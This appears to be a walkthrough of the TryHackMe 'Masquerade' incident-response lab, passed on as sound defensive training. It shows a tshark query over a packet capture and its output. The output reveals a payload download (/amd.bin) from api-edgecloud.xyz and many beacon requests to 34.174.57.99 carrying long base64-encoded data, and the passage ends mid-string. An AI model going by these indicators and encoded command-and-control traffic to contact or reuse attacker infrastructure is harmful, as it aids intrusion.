Masquerade (TryHackMe)
Updated
•11 min read
Link to the challenge on TryHackMe: Masquerade
Scenario
Jim from the Finance department received an email that appeared to come from the company’s system administrator, asking him to run a script to “apply critical security updates.” Trusting the message, Jim executed the script on his workstation. Shortly after, unusual network traffic and system activity were observed. You have been provided with relevant artifacts to investigate what happened, determine the impact, and identify how the attacker established control over the system.
Important!: These artifacts contain real malware; however, the challenge can be completed entirely through static analysis, and there is no need to run or execute any of the files. Despite that, analysis should still be conducted in a controlled environment such as a lab machine (VM).
Challenge - Questions
Good Luck Detective!
Answer the questions below
What external domain was contacted during script execution? api-edgecloud.xyz
tshark -r traffic.pcapng -Y "http" -T fields -e http.host -e http.request.uri
Running as user "root" and group "root". This could be dangerous.
api-edgecloud.xyz /amd.bin
/amd.bin
34.174.57.99 /images?guid=c09Gc3pZOGRaOGF6MWo4bUNKM0tGUktFK2t2b3dOOEtQR2hhWUF0VVlhcUdwWjl4RGJHNXR1UnkyRzdOTXptdQ==
/images?guid=c09Gc3pZOGRaOGF6MWo4bUNKM0tGUktFK2t2b3dOOEtQR2hhWUF0VVlhcUdwWjl4RGJHNXR1UnkyRzdOTXptdQ==
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /images?guid=bk8zVGkzeDhoR1BYMjl5S1MvUHJEdHFTaVBvUlE1Q05xNGFkNS8xRGE3U1hzenBCeDJOamNuc1lGRE1INEdtRERxYkNMc1BsWFlaT2RXbmpYV1l1RGpHenUvdjlkMStCSnV1VC91a1lZVjlGUjR3NVR1TklVOVVBZExkMktDQnRqa0xjSnlpUW9oc1F0REowNS9COC9wQjlSK0EvL20rMGt0RnBhYWxMQW9YeG5teEJ0am81QkphMTExSmdFcXI0THcwSlB0OHg5dk8wNXNrTk92WkczUVNNZ2JUSTlMdGlpL2E4Z0t3NlRCemkybXM4WEVhTlpoQWlEMU5nMTZad0JJVCtSZEN5Wlg1Rm5hUHczcEZDZFVhbEFnRDdraWd4L29XTTVqOVBZWEl3dFBOQk44Tkx6bzNGd054OU9oYlNGSEhvUXdabXdzT3l6L0xsR0g0Zy9UbWRkVlByME1BZnVGNmY0WmptOExCRE40Y2ZzamRwVmJ2MHR1dDc2ZjR2MGQzSVFZT2FadmoxdzJrNm05MTAxcHhJM1I4REw1WWVXRHR6bC9QZUpxU2E3Qis1KzJvSHl0M3FsY1kwaUVoZzJ0ekYyaW9qYVlrSUZjNXVXMmtqUk9rMzFVcVFGengyTzN0c21KTU80L1U0S2VrM3dEQnRESTRiaG5rRjFTZnVKN0ZQVmtxU3R1RVE5Z2tsc0pNS3o5YnoxUzRLOXNpZnhoT0JTVS84ZmFweFRVQ0o5YkprOUt1c2JEZzZyaTQ3Wk1JbVFVRXpxV2ZaU2wwYTZ0VE5TUm40N3FOOFJpbjh4ZzhCTnZyT0FsUHdYMjdxcytqeExJTDFmM1FDcWlNb01mOU4xaTIrT1FneE5TT0pDVzdjb05WSEk4L2JERWh0aWhPa3V0bC85WGZjL2lKVWV1TDVXclFESHp6Mzg2azN2UWxHQzFTQ3ppVHBoRFM2VTFmeXNHSXNINzlIOENYakl4RjBLR0x4RE5YNFE1Y2pGczZSWjJ3K3Exd3BUTjBsclpad3NQbUV1YUdjZ0JoUXNBbW1LQ3AxODhSSUFNK2NaVTV1Q2NBZXJ4dytyaDFkbWk0elVmQUdRM2tqb2RXMTBuaUhPend0UGlDazUycXlmWWlrblJKdW12SDRMbytsb1BXRjNJOWFQTkFBUU94VUE2UkMvZkxwM0g0bkFiNTdmRksrcFRlcHcwc25IVzFuY2RDcjJyZUF1TmEwWFpidkVuK2RoeEdUUU95UTZlakNjSnhUZm1lSEJzZ1phWGNzVUZ6SkZ5N2F1Vk1hYnprZUFTOHNnQWhNeDRzTTAwZlNubGUyOG8xQUdtNEF2eU91VW85eXNtY0ZiN3FyVTZhWldtSVJqdkpXdFRuLzRraC84UUQyc3V6UzlJK2pxWkw0RWFqNzNNRFFDMmhOMmljRFlKWFNnUDZ3b1hvR256RS9ZOERxR2RDY2NsdWJwMVRxcUlodEVYVFM1N3Z0Q2NYeU9VQ1VRNWt2U0tyUkdNRWRrYlpQaHVVN1J0SW9SYlhEUUZtTW5YNmdnMWR6YUZiOTJTR29IZ3VseVY3KzRYYUJRK0FtM1ZDdXg4aXNOWHZWTzZwSDFpWDNIaUFxTlIyT3hYc0J6V2xlME90M3pzTGN1ZzNpNWhUZGZib3BCaS93bWt4KzhocHljYnhzOWJCbEVneENiUlVwRUhyZVpoL0lVY3J4ZXNGYmlyeERBL25icjBmSVAwT2VlOEFXRWVUSjJNZVNUeCt4dkZwcWorVUE0S1l5ZGZQOVJMdWJQcndvTTRJaFIrL0VvQnBTVWxPWEZ3NXNVTnEzQVdDeDVHdFdiWHR2eEt2Zy9NVi9acFJNSkdXcW1IUWZVaTdBc0xTenhnRk9Icm1lMDhTZTNlWVVLcHlzMzhaSXg1STlNRjJRd2YxQ01oaVJ4a0xnTldDT0RjYmY0WU16R2YwTllKT05TWkV2dWYrRWtubWg1YU5OQzBtYiszRWs3dWxmVFlFMGhhMDJoUlk3Ty9odXp5bWZqNm8zTVd0YTk5R0kxSE9KdjNkcU5IYWNqOElTcEdjSTliTC9DamtxWUpqR2YreWEySVhQODhkc3ptN2N5cUplUDZENCtTR211YXlJcWtmK0ZqVk9vMVpWc2liZnVUTXIwd1laemF6RW1icERWc1U3d1J0cEsvTjNMZFV4MFhXTFJTZ0ZTNkNSVHFLc3pWRnlrTnFHeEYrdVBQM2Y1UGNqWmxjcGV1L1VqTlJEbVhoRjM3NnJTNzkrRE9wN015dXFhUVhKNlFzWENFVlhxbVArUnV2cHBoOHlWUHJxZ0pkc2lEOHdJZXNIR1k3Znl6QmtJVFZUYjl4M0s2YU9pZzJ2clJEOVYzYnJHbzBIZ1MrbnZ2N05zNnlobTlkNDNsSjRQL2xNN0s5L2pXZGVjUi9xRWVpclo5WXhwd28vaFhJR0J3cDZQZVFxVFFzQnBqRGpxZkxlaVp4M2lKSXE5Ly9TY3R6QTIzUHdDdXZLbGNYNFlmWDYvVlkvZWVFTCtzZlN6UncyZ0JibnBRR2ZHaGEzZmpmTUFpM0o1aHBhVGJFWnpGVzJmY2VFYzlnMTFESzdWVWtaNnNUd2lLTUxsU0hLN3VSelV0cTJ2bGJtRjhiNi90ajNHdEE4ZS9YTm9WeGhVQ1NMUWZleE4waTMySzFQdUwwaTNmdGtkOVJtcEEyelgwSjhoTm93cjlFZDBoVHk2Nys5azFlcU41MEFWRFBIY3BFbDl1N1k0eXJ2RGV1WFRjZU93d1hUQm16L1ltV0tERlBJcVRLYU0yUzhIQmFOV1BSZXNNeEJua0xJTHpuOTc0TEgydUIvZzFJdUFvNmlaTU53UnZCQjhiNW9UN213aFBsY29KdzRBdmdvSXFUbkJjWUFoSHFnR1BEVzIxN25rb2pmM3VJT01XbU0zbU9RWkNOM2QyUmY3Zzh3K0NYL3NBUjlPMEVPdXFNYXBoTG4wMlNMRHFMOTA2RXU3ZkxTVkFXVzRwY0dGMm1pZGcwMjhjQ0RibXlCZFdRdkJSeHBJK1pIc2U5U0xnaWIxTlUwaUJ5UHFSemhsVzdzN2xML3NYYUdIVk9iUkFZUWJYMXErcjBrRkxHYXF2V1h5VitTOWJCSXJXc01lRlBCNVBEQWE1QS8xa243clpqZnA5aWR4Zm9jQlhUd2luaHlOYTZzcE9FUm5jd1F4a0xrK2pRNWZ5SGN6UXVlOTdaU3E5eUVPQkt0SGJOYlRmc1NsL1hZTzZ5a1dYeCtLY3NiVTNBanlzbXhsKzduTVBHYmttMnU4ZDVEdU5lWlArNEllWEdYUndzL3ZlQWpiLzRCN3k5YkRNZm5wYlRoRmY1Z0VkdldMM1lGcmlFZEZhYjEzeVZTdk9ObXBQVlFwd1d2MWo5Z3lZS2xPMklpVVpuTU9MbjZ2QTB1L1ZuNWFOb2FuTkUwdWpVdDR4dEhOK0xLQXNUQ29aL3VlK1ZZTEFGcWFSTExCWnUvajQ3ZmFYVFZIR2Fub0ZlMWNNUXBKK0k4ZEV0V3lodU00M3F2NGsrekRITU1IelRtTnVTR3FwTmQ2YnRwVjJEcWVTdktKWCtyQzVWSnY3OXowU1FBRURIOW1NR1FJeExYK0xvQW0xcUxaU0hReko3T1RDRTVNVURiVEdSbkNoQitiRkgwM0QzVk1aaUIvaUZzaEI1UWtHdTBpNmtlMGdaOWlzbVFRbHpTdWRpcFhHbUFvNXlCbi92bzZTV1oxZStZUWdscG5OWHFYZDh1Nmd3aHJOcmF2RnBJSVJxdjByQy9oVXcyK0QyV3ZrMXpBNi9RR0JJNlNlVmRYY0hLQ21WaUdRQWJMVjErYnAwZzRzZmZRaGV2bUNkY1lUaktKTGVoTTVMWnRMRWRaVjVueUdVd0YrdDE0N3ZSdWlqZXNYTGVZR3p6Mm1xUnFGSjhIeTZsMDJsK3lQWlpFK2c0ZVM5eGNCVlBIZmpCaEdzVGdNRFVRMjZMbVplWnRELzh2UExRTEczWExRY1VqK3lrbzduT1VjSFlUY2wvaHFUZVRvWWRJdDV2SGZFMk5RL3J0aStZS25ET3dHNFVVYkJNNlV5OHRWdmpPNVJ0M2pxbXVINVY1Y3NlbElPSWFSZkd2dEdXaU01UGtEaXIrN0pUbUhDSHNvUlFRVXdPLzhneVBpMU82STZJVENIRS8rSGVYVGhKeFJVY09wWms3aGRBWUt2NXFPUlVvRC8rNlpTWTNuWW0rYU5tbU5oUldhaVk2a1JrTXYrdHpvNXo0YjNKYmJ1bTlwekx1V0dzSVFZT0J0bFQ1cGtaeTF1QUgxWTNVc042bFZsbWloNVM5MWFtWmZXUll5VUpxcHlxVXhaZFVlaVJ0VG5Ub0Z4RGJBa3h6SFlHZ2lhMlV2cC9iVityRGNUaVdrZ1JsRG5aZnAxZXNObTQ2bktsNUx3RjlxUHlYK290SFpFSmhBL011TTlDcCtxUTFLTDR4UnF4RzBTd2o0OHlsckxEalNHOG8rM0xqOUVwb2dWVldkRlBmc0JNRmVMMWwrQ3U5bVdFa3VoSEtqSTBzcnJFM3QvdW5PQWNsT0xwajhncjhJR3NnY1FVRHcvSVFhZ3RJRUZYWWFIRnFHM051cFZmMTlLUFNOWlN4ZW9QWnIzTDIyOW5HQTBQNzVRdU8zakJCZWY3YUZJRFplTUtRZ0lWZ3AydlRmTDcwQ3BFUFdlL3ZLWHEvbStUN0creW16NWdpMGFOMEkzaWNhWnhHeEF3YWtFalM3QXRjd2EvWWJZTHVqTk9DVjJIS2pxYXFFOVNyWnkrVnJHU0hYS0oyaEJETGF0dWl2OVVQZnBsS2VQejBUTWJsVmlERTgrRGFqSnl0R3A5eTdSVHptS1lDUVF1SUxwY09PUnVGbi9acFlPdmNlRWx2cGRaMVdWMFhqQVRKdXNGa0xqVmd5bnVrNW4rSlRFTkZWbnlpUnVZeDVsYTNzdU14OHRyU09aVWFaNGJrc3dyYVpoQmhHNDd0K084ZFpmTFYwTVFzcG9ZWERsOHRIOGN6N1I1NmxBa2RwdDU5cys1dlB0VUNzRjlaVHR5UUxFWEowcjQ0TDg3bDM1ZFFETUdoWDUvYktXa2JMcDhWbDRLYkl6TjIxalpRSU9YVUllbURaYThobDFnZkFPUzU1WGwzQmo4MkNHd1lJWkVxditXR1BvK0Yxcjc0TVpXU1BQNG1MYXBpVjl4SHc9PQ==
/images?guid=bk8zVGkzeDhoR1BYMjl5S1MvUHJEdHFTaVBvUlE1Q05xNGFkNS8xRGE3U1hzenBCeDJOamNuc1lGRE1INEdtRERxYkNMc1BsWFlaT2RXbmpYV1l1RGpHenUvdjlkMStCSnV1VC91a1lZVjlGUjR3NVR1TklVOVVBZExkMktDQnRqa0xjSnlpUW9oc1F0REowNS9COC9wQjlSK0EvL20rMGt0RnBhYWxMQW9YeG5teEJ0am81QkphMTExSmdFcXI0THcwSlB0OHg5dk8wNXNrTk92WkczUVNNZ2JUSTlMdGlpL2E4Z0t3NlRCemkybXM4WEVhTlpoQWlEMU5nMTZad0JJVCtSZEN5Wlg1Rm5hUHczcEZDZFVhbEFnRDdraWd4L29XTTVqOVBZWEl3dFBOQk44Tkx6bzNGd054OU9oYlNGSEhvUXdabXdzT3l6L0xsR0g0Zy9UbWRkVlByME1BZnVGNmY0WmptOExCRE40Y2ZzamRwVmJ2MHR1dDc2ZjR2MGQzSVFZT2FadmoxdzJrNm05MTAxcHhJM1I4REw1WWVXRHR6bC9QZUpxU2E3Qis1KzJvSHl0M3FsY1kwaUVoZzJ0ekYyaW9qYVlrSUZjNXVXMmtqUk9rMzFVcVFGengyTzN0c21KTU80L1U0S2VrM3dEQnRESTRiaG5rRjFTZnVKN0ZQVmtxU3R1RVE5Z2tsc0pNS3o5YnoxUzRLOXNpZnhoT0JTVS84ZmFweFRVQ0o5YkprOUt1c2JEZzZyaTQ3Wk1JbVFVRXpxV2ZaU2wwYTZ0VE5TUm40N3FOOFJpbjh4ZzhCTnZyT0FsUHdYMjdxcytqeExJTDFmM1FDcWlNb01mOU4xaTIrT1FneE5TT0pDVzdjb05WSEk4L2JERWh0aWhPa3V0bC85WGZjL2lKVWV1TDVXclFESHp6Mzg2azN2UWxHQzFTQ3ppVHBoRFM2VTFmeXNHSXNINzlIOENYakl4RjBLR0x4RE5YNFE1Y2pGczZSWjJ3K3Exd3BUTjBsclpad3NQbUV1YUdjZ0JoUXNBbW1LQ3AxODhSSUFNK2NaVTV1Q2NBZXJ4dytyaDFkbWk0elVmQUdRM2tqb2RXMTBuaUhPend0UGlDazUycXlmWWlrblJKdW12SDRMbytsb1BXRjNJOWFQTkFBUU94VUE2UkMvZkxwM0g0bkFiNTdmRksrcFRlcHcwc25IVzFuY2RDcjJyZUF1TmEwWFpidkVuK2RoeEdUUU95UTZlakNjSnhUZm1lSEJzZ1phWGNzVUZ6SkZ5N2F1Vk1hYnprZUFTOHNnQWhNeDRzTTAwZlNubGUyOG8xQUdtNEF2eU91VW85eXNtY0ZiN3FyVTZhWldtSVJqdkpXdFRuLzRraC84UUQyc3V6UzlJK2pxWkw0RWFqNzNNRFFDMmhOMmljRFlKWFNnUDZ3b1hvR256RS9ZOERxR2RDY2NsdWJwMVRxcUlodEVYVFM1N3Z0Q2NYeU9VQ1VRNWt2U0tyUkdNRWRrYlpQaHVVN1J0SW9SYlhEUUZtTW5YNmdnMWR6YUZiOTJTR29IZ3VseVY3KzRYYUJRK0FtM1ZDdXg4aXNOWHZWTzZwSDFpWDNIaUFxTlIyT3hYc0J6V2xlME90M3pzTGN1ZzNpNWhUZGZib3BCaS93bWt4KzhocHljYnhzOWJCbEVneENiUlVwRUhyZVpoL0lVY3J4ZXNGYmlyeERBL25icjBmSVAwT2VlOEFXRWVUSjJNZVNUeCt4dkZwcWorVUE0S1l5ZGZQOVJMdWJQcndvTTRJaFIrL0VvQnBTVWxPWEZ3NXNVTnEzQVdDeDVHdFdiWHR2eEt2Zy9NVi9acFJNSkdXcW1IUWZVaTdBc0xTenhnRk9Icm1lMDhTZTNlWVVLcHlzMzhaSXg1STlNRjJRd2YxQ01oaVJ4a0xnTldDT0RjYmY0WU16R2YwTllKT05TWkV2dWYrRWtubWg1YU5OQzBtYiszRWs3dWxmVFlFMGhhMDJoUlk3Ty9odXp5bWZqNm8zTVd0YTk5R0kxSE9KdjNkcU5IYWNqOElTcEdjSTliTC9DamtxWUpqR2YreWEySVhQODhkc3ptN2N5cUplUDZENCtTR211YXlJcWtmK0ZqVk9vMVpWc2liZnVUTXIwd1laemF6RW1icERWc1U3d1J0cEsvTjNMZFV4MFhXTFJTZ0ZTNkNSVHFLc3pWRnlrTnFHeEYrdVBQM2Y1UGNqWmxjcGV1L1VqTlJEbVhoRjM3NnJTNzkrRE9wN015dXFhUVhKNlFzWENFVlhxbVArUnV2cHBoOHlWUHJxZ0pkc2lEOHdJZXNIR1k3Znl6QmtJVFZUYjl4M0s2YU9pZzJ2clJEOVYzYnJHbzBIZ1MrbnZ2N05zNnlobTlkNDNsSjRQL2xNN0s5L2pXZGVjUi9xRWVpclo5WXhwd28vaFhJR0J3cDZQZVFxVFFzQnBqRGpxZkxlaVp4M2lKSXE5Ly9TY3R6QTIzUHdDdXZLbGNYNFlmWDYvVlkvZWVFTCtzZlN6UncyZ0JibnBRR2ZHaGEzZmpmTUFpM0o1aHBhVGJFWnpGVzJmY2VFYzlnMTFESzdWVWtaNnNUd2lLTUxsU0hLN3VSelV0cTJ2bGJtRjhiNi90ajNHdEE4ZS9YTm9WeGhVQ1NMUWZleE4waTMySzFQdUwwaTNmdGtkOVJtcEEyelgwSjhoTm93cjlFZDBoVHk2Nys5azFlcU41MEFWRFBIY3BFbDl1N1k0eXJ2RGV1WFRjZU93d1hUQm16L1ltV0tERlBJcVRLYU0yUzhIQmFOV1BSZXNNeEJua0xJTHpuOTc0TEgydUIvZzFJdUFvNmlaTU53UnZCQjhiNW9UN213aFBsY29KdzRBdmdvSXFUbkJjWUFoSHFnR1BEVzIxN25rb2pmM3VJT01XbU0zbU9RWkNOM2QyUmY3Zzh3K0NYL3NBUjlPMEVPdXFNYXBoTG4wMlNMRHFMOTA2RXU3ZkxTVkFXVzRwY0dGMm1pZGcwMjhjQ0RibXlCZFdRdkJSeHBJK1pIc2U5U0xnaWIxTlUwaUJ5UHFSemhsVzdzN2xML3NYYUdIVk9iUkFZUWJYMXErcjBrRkxHYXF2V1h5VitTOWJCSXJXc01lRlBCNVBEQWE1QS8xa243clpqZnA5aWR4Zm9jQlhUd2luaHlOYTZzcE9FUm5jd1F4a0xrK2pRNWZ5SGN6UXVlOTdaU3E5eUVPQkt0SGJOYlRmc1NsL1hZTzZ5a1dYeCtLY3NiVTNBanlzbXhsKzduTVBHYmttMnU4ZDVEdU5lWlArNEllWEdYUndzL3ZlQWpiLzRCN3k5YkRNZm5wYlRoRmY1Z0VkdldMM1lGcmlFZEZhYjEzeVZTdk9ObXBQVlFwd1d2MWo5Z3lZS2xPMklpVVpuTU9MbjZ2QTB1L1ZuNWFOb2FuTkUwdWpVdDR4dEhOK0xLQXNUQ29aL3VlK1ZZTEFGcWFSTExCWnUvajQ3ZmFYVFZIR2Fub0ZlMWNNUXBKK0k4ZEV0V3lodU00M3F2NGsrekRITU1IelRtTnVTR3FwTmQ2YnRwVjJEcWVTdktKWCtyQzVWSnY3OXowU1FBRURIOW1NR1FJeExYK0xvQW0xcUxaU0hReko3T1RDRTVNVURiVEdSbkNoQitiRkgwM0QzVk1aaUIvaUZzaEI1UWtHdTBpNmtlMGdaOWlzbVFRbHpTdWRpcFhHbUFvNXlCbi92bzZTV1oxZStZUWdscG5OWHFYZDh1Nmd3aHJOcmF2RnBJSVJxdjByQy9oVXcyK0QyV3ZrMXpBNi9RR0JJNlNlVmRYY0hLQ21WaUdRQWJMVjErYnAwZzRzZmZRaGV2bUNkY1lUaktKTGVoTTVMWnRMRWRaVjVueUdVd0YrdDE0N3ZSdWlqZXNYTGVZR3p6Mm1xUnFGSjhIeTZsMDJsK3lQWlpFK2c0ZVM5eGNCVlBIZmpCaEdzVGdNRFVRMjZMbVplWnRELzh2UExRTEczWExRY1VqK3lrbzduT1VjSFlUY2wvaHFUZVRvWWRJdDV2SGZFMk5RL3J0aStZS25ET3dHNFVVYkJNNlV5OHRWdmpPNVJ0M2pxbXVINVY1Y3NlbElPSWFSZkd2dEdXaU01UGtEaXIrN0pUbUhDSHNvUlFRVXdPLzhneVBpMU82STZJVENIRS8rSGVYVGhKeFJVY09wWms3aGRBWUt2NXFPUlVvRC8rNlpTWTNuWW0rYU5tbU5oUldhaVk2a1JrTXYrdHpvNXo0YjNKYmJ1bTlwekx1V0dzSVFZT0J0bFQ1cGtaeTF1QUgxWTNVc042bFZsbWloNVM5MWFtWmZXUll5VUpxcHlxVXhaZFVlaVJ0VG5Ub0Z4RGJBa3h6SFlHZ2lhMlV2cC9iVityRGNUaVdrZ1JsRG5aZnAxZXNObTQ2bktsNUx3RjlxUHlYK290SFpFSmhBL011TTlDcCtxUTFLTDR4UnF4RzBTd2o0OHlsckxEalNHOG8rM0xqOUVwb2dWVldkRlBmc0JNRmVMMWwrQ3U5bVdFa3VoSEtqSTBzcnJFM3QvdW5PQWNsT0xwajhncjhJR3NnY1FVRHcvSVFhZ3RJRUZYWWFIRnFHM051cFZmMTlLUFNOWlN4ZW9QWnIzTDIyOW5HQTBQNzVRdU8zakJCZWY3YUZJRFplTUtRZ0lWZ3AydlRmTDcwQ3BFUFdlL3ZLWHEvbStUN0creW16NWdpMGFOMEkzaWNhWnhHeEF3YWtFalM3QXRjd2EvWWJZTHVqTk9DVjJIS2pxYXFFOVNyWnkrVnJHU0hYS0oyaEJETGF0dWl2OVVQZnBsS2VQejBUTWJsVmlERTgrRGFqSnl0R3A5eTdSVHptS1lDUVF1SUxwY09PUnVGbi9acFlPdmNlRWx2cGRaMVdWMFhqQVRKdXNGa0xqVmd5bnVrNW4rSlRFTkZWbnlpUnVZeDVsYTNzdU14OHRyU09aVWFaNGJrc3dyYVpoQmhHNDd0K084ZFpmTFYwTVFzcG9ZWERsOHRIOGN6N1I1NmxBa2RwdDU5cys1dlB0VUNzRjlaVHR5UUxFWEowcjQ0TDg3bDM1ZFFETUdoWDUvYktXa2JMcDhWbDRLYkl6TjIxalpRSU9YVUllbURaYThobDFnZkFPUzU1WGwzQmo4MkNHd1lJWkVxditXR1BvK0Yxcjc0TVpXU1BQNG1MYXBpVjl4SHc9PQ==
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /images?guid=K2FZUkhHSUlLRDJsNlZ1K3NGcUtqS3U3ZlJPN1FJdDdsSlUwSzNTbithaTBOQ2gwNEs1ZjhiSklET3NuaTVKYlk3TXZYem1Rd05nVWlDV2tCbzVhTGswaTRGZ2pjUzJVMWt0aHFSL3JvUTFVUUZWMVBnRVZmdGt6ajF3OXdmaXI1clBRYzFMQkRYR1V1Q2o2WDVKWFN6bnl3bVhJZE9uR01GQ0d3OFd5dGh6WGsyU2t6TnphcC82cHE0NUhYMTVESkxQOEM5cXJXTTdZUmt6aEJrb0JpQi90RUJKWm1YWUV1ODJpYkUzN0FwQVBidzVxZlhtVlVBNUVrZE5SUGpoaDhkYm1ZQjhmOGhObmFaVmx0a2tCUmZIa2s1a1N4S1ZqbTRjdkhGSXJrVHkrQ2cyZUdKd0NaOGFzRFNGYmQ0YVc1S29aWXBLZkMrYmYzaEp3Mnk3OWdIR0lEejY2NUs4dTRuT3YvWVBZZUJCVWVuTVR3Q3FGNXRDM1Z0UTlyYXdPVlBvOEtVZ0JRWnJmVGZEUEJmRTdvZmtGY0NxY05rMmxHQ2lMZnowSlVxNEdaR1IvVFNyclJiTHhNakhTK3RDeUFsVjNkdHJHSEhJUy95aUNQZDA3dDErUUJSbHJRSHdQcGlPTTlCMVgvZisyTDQyTENObXp1aGJ4bFlOL0JCbjJBL1lyZjNmejZrVXp5Y1VVQXVKNVR3TENjTm0yRHFGajdBU1dOVCs3ZUFVQldBWFNGdllsQTdHOGxMVTNPeEppNWVxWGxKZ204ZSttTkVwM0RSQkYyMjAxOVBpYnFtcDFsRjJLcXFBdncxOTZETGpaZEQ1eUJHaXV4TFh3VGE1UTZNWXRJbXRYc29RL3pRL0RteFF2VndPRk5xVHRscElnQzByR1hqcVF6bTdPVCthUUZKL3pEcFVqVHNRMW54ZXBOYTFhSkU5VXl5L3BtVXFLR3pWcTc1RXpORXF4d280TTJ3M21BK09paW5nQ0xEZktmcGZyR0JHZ2Y1WjQvQUl3cXZsc2R6NlhTcEZMSkhLM0pLMGh4UUJYK2I0aG1NK25BZCtiUXI5aGVtMXgwUVNLQkVnNFFMZ2J0ejVLbW5DL3JSY3FRVkVvaHViamxzdE96Vm5LOG54UDNRL3BQRkczeWpaRUFLdURBeGdVYWlMN2xOYXVXbHFQSFZ3MUxrRFFXZEZRZGZ0Zy80d0JWZXZtcUNrWFRieStrZm9oWE5OU0dOa0kyRUwyRndic1N3Y2tGSlN1bC9kdWRQMVlpQzVEU09tTFJMak5EKy92aGhhajZNUnkwdnZDOU1ZNnRZMGE3VkhEb0NYYllxWG0rMzZBSVQ0TXE2N2xDZWcvUUhwWFY5ZkNmYXdKSWJFZkR3YU9VbVJnTzY4bmFKaHlDdDBWZmlSeUl1anpTb2hjVGZFWEhqdnhsazRRQlNHREZUYWpiaUh3dVdtbmhCU2dYcFFveld1WmVVcXdRbXVNY0FCdmk4RFY1clFJREUrL3NJVmtDTTFuaVoweHBYM0txbDVRZU5CTnJEc2tQQzBaZ0hkdjFqT25wU0I0aWhVSFA4QTVtUG5qQXV2SzdaVEdUbS8wQWYxbk14ZWttTmI4ZmlPdXZkS1BGZFEzV2I5OUQ5WDJhc2RqWU1GeWtBSmYrOGd6U3dVNmlnOGtGbldsbG0zbDRBeDFjV1JUY0V1WHdDT2JOT3dKd3dha0prek9BVWc5V1J2dHVmWm82bG44ekVTRzJmRVBuUW9keTFkNjNOMnFBOFk3Tk93WTBRRjZVWWZWbVNRTXJ0cG95My9OeFJrNkNoYTNvYkxXU0F6czZJVjZGRDJaQWt2VStsK1hvckswSFdEeW9oZnBRenNLWXp1NFZzQkZjeEl4TUZhSGZOTzdtV1d6aHNIa2dIZmdIOVZmZmtxOWhqUUdUenB5OE5VblBybFFnbG1KUk53VHl1MnhKSmN2VVRhMk5rSXZBN0c4ODdaYVJEd1VlMkROOTV5OURUTloxZGRLRVZ1ZEppVDF0ajRQZXNsV21zUnFxMnJUVGpQbG4zMEgybTRyQ1liN1VmZ3RBdlBPNlNrNkpHVDFsMElDRFNUYTN5bVhJUDhWMHppKzZoRFhGNXU5eG5hMVZDN0FtUkhWcUl2OHpDV1VUR1dSa3h1Qk9XVDU1MGc3cjNoamVuSW1ENVpDTWpvRXhyUVJZVkVCR3pJdnpKa0JsVFFsTldVTzh4dDRnRDZyc0ZvWFVpNFF6b2xWb2Q1Q2JmL24vTXJNVGxqREFNb1RoUXAvd24rYjJsdHF4aTRUaWpTTFp6ZGlOQ01OcUxsalhuK0wvckNWU3ZkR0RVSmd0WG9QTGpoc3hFc0xxZGlMWW94MWNrYkJzbFV6Uk4xbHNOUG12ODFhcnFEQTRQWnVRYlNCYms1U3hjUjdFZXF1c3VhSjUwaWl1a2FrclZxN3ovbXVlTnIvK3B5UjMyUnhocUxNT3BRem93Q1ZMd0NCYm12LzhaM3BuWklCSFhPdFp4amw3U0FFZkNtSkt0bXk5TUhaUExIL3hxTWZnZFUzUkRkNTJONXREWE5oV05aZEwwdHdSN21YZEJPeVE4SE9RMmhmRlIwR1dKZ2xvckcwMEgzeUoraWE5RStqMzhWL3pQUkwvTFoxcUJ2WTlXRkpBbnlvU1E9PQ==
/images?guid=K2FZUkhHSUlLRDJsNlZ1K3NGcUtqS3U3ZlJPN1FJdDdsSlUwSzNTbithaTBOQ2gwNEs1ZjhiSklET3NuaTVKYlk3TXZYem1Rd05nVWlDV2tCbzVhTGswaTRGZ2pjUzJVMWt0aHFSL3JvUTFVUUZWMVBnRVZmdGt6ajF3OXdmaXI1clBRYzFMQkRYR1V1Q2o2WDVKWFN6bnl3bVhJZE9uR01GQ0d3OFd5dGh6WGsyU2t6TnphcC82cHE0NUhYMTVESkxQOEM5cXJXTTdZUmt6aEJrb0JpQi90RUJKWm1YWUV1ODJpYkUzN0FwQVBidzVxZlhtVlVBNUVrZE5SUGpoaDhkYm1ZQjhmOGhObmFaVmx0a2tCUmZIa2s1a1N4S1ZqbTRjdkhGSXJrVHkrQ2cyZUdKd0NaOGFzRFNGYmQ0YVc1S29aWXBLZkMrYmYzaEp3Mnk3OWdIR0lEejY2NUs4dTRuT3YvWVBZZUJCVWVuTVR3Q3FGNXRDM1Z0UTlyYXdPVlBvOEtVZ0JRWnJmVGZEUEJmRTdvZmtGY0NxY05rMmxHQ2lMZnowSlVxNEdaR1IvVFNyclJiTHhNakhTK3RDeUFsVjNkdHJHSEhJUy95aUNQZDA3dDErUUJSbHJRSHdQcGlPTTlCMVgvZisyTDQyTENObXp1aGJ4bFlOL0JCbjJBL1lyZjNmejZrVXp5Y1VVQXVKNVR3TENjTm0yRHFGajdBU1dOVCs3ZUFVQldBWFNGdllsQTdHOGxMVTNPeEppNWVxWGxKZ204ZSttTkVwM0RSQkYyMjAxOVBpYnFtcDFsRjJLcXFBdncxOTZETGpaZEQ1eUJHaXV4TFh3VGE1UTZNWXRJbXRYc29RL3pRL0RteFF2VndPRk5xVHRscElnQzByR1hqcVF6bTdPVCthUUZKL3pEcFVqVHNRMW54ZXBOYTFhSkU5VXl5L3BtVXFLR3pWcTc1RXpORXF4d280TTJ3M21BK09paW5nQ0xEZktmcGZyR0JHZ2Y1WjQvQUl3cXZsc2R6NlhTcEZMSkhLM0pLMGh4UUJYK2I0aG1NK25BZCtiUXI5aGVtMXgwUVNLQkVnNFFMZ2J0ejVLbW5DL3JSY3FRVkVvaHViamxzdE96Vm5LOG54UDNRL3BQRkczeWpaRUFLdURBeGdVYWlMN2xOYXVXbHFQSFZ3MUxrRFFXZEZRZGZ0Zy80d0JWZXZtcUNrWFRieStrZm9oWE5OU0dOa0kyRUwyRndic1N3Y2tGSlN1bC9kdWRQMVlpQzVEU09tTFJMak5EKy92aGhhajZNUnkwdnZDOU1ZNnRZMGE3VkhEb0NYYllxWG0rMzZBSVQ0TXE2N2xDZWcvUUhwWFY5ZkNmYXdKSWJFZkR3YU9VbVJnTzY4bmFKaHlDdDBWZmlSeUl1anpTb2hjVGZFWEhqdnhsazRRQlNHREZUYWpiaUh3dVdtbmhCU2dYcFFveld1WmVVcXdRbXVNY0FCdmk4RFY1clFJREUrL3NJVmtDTTFuaVoweHBYM0txbDVRZU5CTnJEc2tQQzBaZ0hkdjF